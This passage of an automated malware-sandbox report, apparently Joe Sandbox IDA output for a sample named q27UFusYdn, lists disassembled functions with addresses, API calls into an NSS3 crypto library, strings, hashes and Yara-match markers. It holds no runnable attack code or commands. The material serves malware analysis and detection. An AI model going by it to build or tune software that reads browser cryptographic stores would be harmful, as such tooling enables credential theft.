Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Error
String ID: Ol$5s/
API String ID: 2619118453-1115750854
Opcode ID: 02f586e3df0f63a81a5814e7014035ef729c9c3b569d263198a947a22e44e9e6
Instruction ID: cb878d00874ec0cd9760e4e3c35f786f1cdfc104b9dbadbb8557927dd5658de2
Opcode Fuzzy Hash: 02f586e3df0f63a81a5814e7014035ef729c9c3b569d263198a947a22e44e9e6
Instruction Fuzzy Hash: 1931BDB1A01218AFDF04DF85C9C4B9EBBB6AF89318F249219E8091F745D379E945CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE184C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6CE184D9

Part of subcall function 6CE710C0: TlsGetValue.KERNEL32(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE710F3
Part of subcall function 6CE710C0: EnterCriticalSection.KERNEL32(?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7110C
Part of subcall function 6CE710C0: PL_ArenaAllocate.NSS3(?,?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE71141
Part of subcall function 6CE710C0: PR_Unlock.NSS3(?,?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE71182
Part of subcall function 6CE710C0: TlsGetValue.KERNEL32(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7119C

PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CE18528

Strings

5s/, xrefs: 6CE184CC

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Arena$Alloc_UtilValue$AllocateCriticalEnterSectionUnlock
String ID: 5s/
API String ID: 3601948890-340167759
Opcode ID: 1dee4c3cee8bef38507a302aaff13c8409f3256c39f2d745eb4d7e538685201a
Instruction ID: 206ecb96d3d82f461c70d6477db76ca66a0055ff117337b120cc40e6f1a97894
Opcode Fuzzy Hash: 1dee4c3cee8bef38507a302aaff13c8409f3256c39f2d745eb4d7e538685201a
Instruction Fuzzy Hash: 34216D70A0520A9FEB10CF65D850BAA77F8FF4631CF65806AD819AB750F731DA14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3AD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 6CE3A4D0: PL_strncasecmp.NSS3(6CE128AD,pkcs11:,00000007), ref: 6CE3A501
Part of subcall function 6CE3A4D0: PORT_Strdup_Util.NSS3(6CE128AD), ref: 6CE3A514
Part of subcall function 6CE3A4D0: strchr.VCRUNTIME140(00000000,0000003A), ref: 6CE3A529

PR_Now.NSS3 ref: 6CE3ADA8

Part of subcall function 6CED9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CF20A27), ref: 6CED9DC6
Part of subcall function 6CED9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CF20A27), ref: 6CED9DD1
Part of subcall function 6CED9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CED9DED

CERT_NewCertList.NSS3 ref: 6CE3ADB5

Part of subcall function 6CE12F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CE12F0A
Part of subcall function 6CE12F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CE12F1D

Part of subcall function 6CE2FE20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,?), ref: 6CE2FE6A
Part of subcall function 6CE2FE20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,?), ref: 6CE2FE7E
Part of subcall function 6CE2FE20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,?), ref: 6CE2FE96
Part of subcall function 6CE2FE20: CERT_GetCertTrust.NSS3(?,?), ref: 6CE2FEB8

Part of subcall function 6CE13360: PORT_ArenaAlloc_Util.NSS3(60EC83F8,00000010,?,00000000,?,?,?,6CE1A708,?,00000000,6CE13100,?,6CE1A2FA,00000000), ref: 6CE1336F

Strings

5s/, xrefs: 6CE3AD92

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Time$Alloc_ArenaCertSystem$Arena_CriticalEnterFileL_strncasecmpListSectionStrdup_TrustUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strchr
String ID: 5s/
API String ID: 3699053031-340167759
Opcode ID: 1a4e154bf96bc1aec84d2a156564a3c48223fb845ac5f23a456d4127e6b51918
Instruction ID: 37281c09e496db7dc8e8c49cbbad35c681b51695b4bcd07632f0d0fb04397b87
Opcode Fuzzy Hash: 1a4e154bf96bc1aec84d2a156564a3c48223fb845ac5f23a456d4127e6b51918
Instruction Fuzzy Hash: C011C8B2A043105B9B00DF65CC4059BB3B59F8521CF70852DE95947B41EB34F959C692

Uniqueness

Uniqueness Score: -1.00%

Function 6CE22C70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6CE63440: PK11_GetAllTokens.NSS3 ref: 6CE63481
Part of subcall function 6CE63440: PR_SetError.NSS3(00000000,00000000), ref: 6CE634A3
Part of subcall function 6CE63440: TlsGetValue.KERNEL32 ref: 6CE6352E
Part of subcall function 6CE63440: EnterCriticalSection.KERNEL32(?), ref: 6CE63542
Part of subcall function 6CE63440: PR_Unlock.NSS3(?), ref: 6CE6355B

PK11_GenerateKeyPairWithOpFlags.NSS3(00000000,00001040,?,?,0000008A,00080000,00080800,?,?,?,?,?,?,?,?), ref: 6CE22CC1

Part of subcall function 6CE36D90: memcpy.VCRUNTIME140(?,6CF3A8EC,0000006C), ref: 6CE36DC6
Part of subcall function 6CE36D90: memcpy.VCRUNTIME140(?,6CF3A958,0000006C), ref: 6CE36DDB
Part of subcall function 6CE36D90: memcpy.VCRUNTIME140(?,6CF3A9C4,00000078), ref: 6CE36DF1
Part of subcall function 6CE36D90: memcpy.VCRUNTIME140(?,6CF3AA3C,0000006C), ref: 6CE36E06
Part of subcall function 6CE36D90: memcpy.VCRUNTIME140(?,6CF3AAA8,00000060), ref: 6CE36E1C
Part of subcall function 6CE36D90: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE36E38

PK11_GenerateKeyPairWithOpFlags.NSS3(00000000,00001040,?,?,00000046,00080000,00080800,?), ref: 6CE22CE8

Part of subcall function 6CE36D90: PK11_DoesMechanism.NSS3(?,?), ref: 6CE36E76
Part of subcall function 6CE36D90: TlsGetValue.KERNEL32 ref: 6CE3726F
Part of subcall function 6CE36D90: EnterCriticalSection.KERNEL32(?), ref: 6CE37283

Strings

5s/, xrefs: 6CE22C7C

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: memcpy$K11_$CriticalEnterErrorFlagsGeneratePairSectionValueWith$DoesMechanismTokensUnlock
String ID: 5s/
API String ID: 2473486326-340167759
Opcode ID: f402f430697164e72b4b8c62881dfdd054a50db9857bb6bcefc0f01d6aff9547
Instruction ID: 84dc4a3e18f98b3a7e9846331d4f18c9f19f31ef1c7cf8a9365e74d49ef86b6c
Opcode Fuzzy Hash: f402f430697164e72b4b8c62881dfdd054a50db9857bb6bcefc0f01d6aff9547
Instruction Fuzzy Hash: A1112FB1A002087BEB115A62AC42FDB367DEB4475CF200025FF44AE780EA76E91887F5

Uniqueness

Uniqueness Score: -1.00%

Function 00415260 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

GetSystemTime.KERNEL32(?,04146770,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Strings

#F@, xrefs: 004152B1, 004152E1, 004152E4
#F@, xrefs: 0041526C, 004152E5, 004152F0, 00415304, 004152D3, 004152F3

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: SystemTimelstrcpy
String ID: #F@$#F@
API String ID: 62757014-661595268
Opcode ID: 9c4578540c9875f99c455bf3a30fbf78bf8634aa42411cf7279c1c4ce97c61ea
Instruction ID: 513f033f75459e748f43dcf9dcce4e772375218857ee2e068f26327ba23d5006
Opcode Fuzzy Hash: 9c4578540c9875f99c455bf3a30fbf78bf8634aa42411cf7279c1c4ce97c61ea
Instruction Fuzzy Hash: 8511D636D00108DFCB04EFA9D891AEE7B75EF98304F54C05EE41567251DF38AA85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 6CE268F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6CE2690C

Part of subcall function 6CE6BE30: SECOID_FindOID_Util.NSS3(6CE2311B,00000000,?,6CE2311B,?), ref: 6CE6BE44

PR_SetError.NSS3(FFFFE00A,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CE26946

Part of subcall function 6CEBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CEBC2BF

Strings

5s/, xrefs: 6CE268FE

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$AlgorithmErrorFindTag_Value
String ID: 5s/
API String ID: 778764003-340167759
Opcode ID: c5f4dd4eba3f56d3d4ecf3afa6019f5a337f0bc1638f972cba377728a362eb1f
Instruction ID: d24b9b8c16bf0d1702ad80d39375bbd28b52fc349f4d7c48e968437042553b97
Opcode Fuzzy Hash: c5f4dd4eba3f56d3d4ecf3afa6019f5a337f0bc1638f972cba377728a362eb1f
Instruction Fuzzy Hash: D4118E72E0010AABDF009E65DC01ABF3779EF84218F254128FD19D7700EA31A919C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE36CB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE028,00000000,6CE24D85,?,6CE520B1,6CE24D85,?,?,6CE24D85,?), ref: 6CE36D10

Part of subcall function 6CE51940: TlsGetValue.KERNEL32(00000000,00000000,?,00000001,?,6CE5563C,?,?,00000000,00000001,00000002,?,?,?,?,?), ref: 6CE5195C
Part of subcall function 6CE51940: EnterCriticalSection.KERNEL32(?,?,6CE5563C,?,?,00000000,00000001,00000002,?,?,?,?,?,6CE2EAC5,00000001), ref: 6CE51970
Part of subcall function 6CE51940: PR_Unlock.NSS3(?,?,00000000,00000001,00000002,?,?,?,?,?,6CE2EAC5,00000001,?,6CE2CE9B,00000001,6CE2EAC5), ref: 6CE519A0

free.MOZGLUE(6CE24D85,?,?,?,?,?,6CE24D85,?,6CE520B1,6CE24D85,?,?,6CE24D85,?), ref: 6CE36D3E

Strings

5s/, xrefs: 6CE36CBA

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValuefree
String ID: 5s/
API String ID: 2146238652-340167759
Opcode ID: 6da42323c6e4663d72776bd79ad9ae690f6dfdeeee51c95e4b774cbb50c49278
Instruction ID: 81ff3db178975afe31104ad40e72430b30d93de3134b97c1cece1998c43fef30
Opcode Fuzzy Hash: 6da42323c6e4663d72776bd79ad9ae690f6dfdeeee51c95e4b774cbb50c49278
Instruction Fuzzy Hash: 6411EC75E04214ABDF00EFA9DC02FAA77B8AF05314F654059E80DAB781E671B914C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE22DD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SECOID_CopyAlgorithmID_Util.NSS3(-000000D4,-00000004,6CE1C0D2,6CE1C0CE,00000000,-000000D4,?), ref: 6CE22DF5

Part of subcall function 6CE6BF20: SECITEM_CopyItem_Util.NSS3(-00000004,-000000D4,6CE22DFA,00000000,-000000D4,6CE1C0CE,?,6CE22DFA,-000000D4,-00000004,6CE1C0D2,6CE1C0CE,00000000,-000000D4,?), ref: 6CE6BF32
Part of subcall function 6CE6BF20: SECITEM_CopyItem_Util.NSS3(-00000004,-000000E0,6CE22DEE,-000000D4,-00000004,6CE1C0D2,6CE1C0CE,00000000,-000000D4,?), ref: 6CE6BF47

SECITEM_CopyItem_Util.NSS3(-000000D4,-0000001C,?,?,?,?,6CE1C0CE,00000000,-000000D4,?), ref: 6CE22E27

Part of subcall function 6CE6FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CE68D2D,?,00000000,?), ref: 6CE6FB85
Part of subcall function 6CE6FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CE6FBB1

Strings

5s/, xrefs: 6CE22DE2

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Copy$Item_$AlgorithmAlloc_Arenamemcpy
String ID: 5s/
API String ID: 2899196045-340167759
Opcode ID: 9ab366fdb1fc3e0fb941c2013b090c4f255fad28b3cdbcf6b3106f62bc645b95
Instruction ID: cff053341145dc7711d933a255212a6862afc239962d4071bf0be3daeb87ea3a
Opcode Fuzzy Hash: 9ab366fdb1fc3e0fb941c2013b090c4f255fad28b3cdbcf6b3106f62bc645b95
Instruction Fuzzy Hash: 3B1165B1A00109ABD705CF29CC91ABB77B8EF442187148169EC199F302F731E915CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CE84CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3('8l,00000000,00000000,?,?,6CE83827,?,00000000), ref: 6CE84D0A

Part of subcall function 6CE70840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CE708B4

SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6CE84D22

Part of subcall function 6CE6FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6CE11A3E,00000048,00000054), ref: 6CE6FD56

Strings

'8l, xrefs: 6CE84D07

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Equal_ErrorFindItemsTag_memcmp
String ID: '8l
API String ID: 1521942269-1867215535
Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction ID: ea9e653f4c15b7a26510e4bc0f4a30a701411fdf65783d1e132252bdb495aab0
Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction Fuzzy Hash: 90F0623260222867EB104D6AAD90B4336FCDB426BDF350272ED2CCB7C1E631DC01C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 6CEAAF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6CEAAF78

Part of subcall function 6CE0ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE0ACE2
Part of subcall function 6CE0ACC0: malloc.MOZGLUE(00000001), ref: 6CE0ACEC
Part of subcall function 6CE0ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CE0AD02
Part of subcall function 6CE0ACC0: TlsGetValue.KERNEL32 ref: 6CE0AD3C
Part of subcall function 6CE0ACC0: calloc.MOZGLUE(00000001,?), ref: 6CE0AD8C
Part of subcall function 6CE0ACC0: PR_Unlock.NSS3 ref: 6CE0ADC0
Part of subcall function 6CE0ACC0: PR_Unlock.NSS3 ref: 6CE0AE8C
Part of subcall function 6CE0ACC0: free.MOZGLUE(?), ref: 6CE0AEAB

memcpy.VCRUNTIME140(6CF73084,6CF702AC,00000090), ref: 6CEAAF94

Strings

SSL, xrefs: 6CEAAF73

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: e10644b0ee4c0bf80dd7d3426bc3c9417bbd11d84eb05a82f14420dad26e676a
Instruction ID: 024edd3d001e57cf4f2e7d18c82aab69165412bf802f2155a94657fa680e5933
Opcode Fuzzy Hash: e10644b0ee4c0bf80dd7d3426bc3c9417bbd11d84eb05a82f14420dad26e676a
Instruction Fuzzy Hash: 1D2140B2F25AA8BECA82DF91B84B7567E70B70260C7215019C1494FB24E332445E9FF6

Uniqueness

Uniqueness Score: -1.00%

Function 6CF28CA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39threadCOMMON

Download Yara Rule

APIs

PR_snprintf.NSS3(?,00000028,6CF48547,73350DE1), ref: 6CF28CD8

Part of subcall function 6CE00F00: PR_GetPageSize.NSS3(6CE00936,FFFFE8AE,?,6CD916B7,00000000,?,6CE00936,00000000,?,6CD9204A), ref: 6CE00F1B
Part of subcall function 6CE00F00: PR_NewLogModule.NSS3(clock,6CE00936,FFFFE8AE,?,6CD916B7,00000000,?,6CE00936,00000000,?,6CD9204A), ref: 6CE00F25

PR_GetCurrentThread.NSS3 ref: 6CF28CE5

Strings

5s/, xrefs: 6CF28CA7

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CurrentModulePageR_snprintfSizeThread
String ID: 5s/
API String ID: 1660122677-340167759
Opcode ID: 9278aeb63080eebe6b61931e6338b5aeefd68eec6215ab177453fe5fc7e8ccba
Instruction ID: f0aab982e87fbd39892d86f3830e917bb8f9c98374f25ddccb64bdcab2e23c65
Opcode Fuzzy Hash: 9278aeb63080eebe6b61931e6338b5aeefd68eec6215ab177453fe5fc7e8ccba
Instruction Fuzzy Hash: F7F02872D10238ABC704AFB9D8407AE37B4EB08719F11816EE8499B790D7354888C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3CC10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6CE3CC22

Part of subcall function 6CE12F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CE12F0A
Part of subcall function 6CE12F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CE12F1D

CERT_DestroyCertList.NSS3(00000000), ref: 6CE3CC44

Part of subcall function 6CE12F50: CERT_DestroyCertificate.NSS3(?), ref: 6CE12F65
Part of subcall function 6CE12F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CE12F83

Strings

5s/, xrefs: 6CE3CC18

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Arena_CertDestroyList$Alloc_ArenaCertificateFree
String ID: 5s/
API String ID: 3533527289-340167759
Opcode ID: 83bef67d52c6a7b390f6f2a86e61f0dacf048a4dfb68b9e2a8408043ef1d275c
Instruction ID: 46a47893c7af2fe8162040742de3608ab5516627891c5d1a2b6bfb4cfc2aaf71
Opcode Fuzzy Hash: 83bef67d52c6a7b390f6f2a86e61f0dacf048a4dfb68b9e2a8408043ef1d275c
Instruction Fuzzy Hash: 3BF08271F00229978B00AB7E9A059ABB7B49FC6558B21813DD81CDB700FA31E909C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE00F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6CE00936,FFFFE8AE,?,6CD916B7,00000000,?,6CE00936,00000000,?,6CD9204A), ref: 6CE00F1B

Part of subcall function 6CE01370: GetSystemInfo.KERNEL32(?,?,?,?,6CE00936,?,6CE00F20,6CE00936,FFFFE8AE,?,6CD916B7,00000000,?,6CE00936,00000000), ref: 6CE0138F

PR_NewLogModule.NSS3(clock,6CE00936,FFFFE8AE,?,6CD916B7,00000000,?,6CE00936,00000000,?,6CD9204A), ref: 6CE00F25

Part of subcall function 6CE01110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6CE00936,00000001,00000040), ref: 6CE01130
Part of subcall function 6CE01110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6CE00936,00000001,00000040), ref: 6CE01142
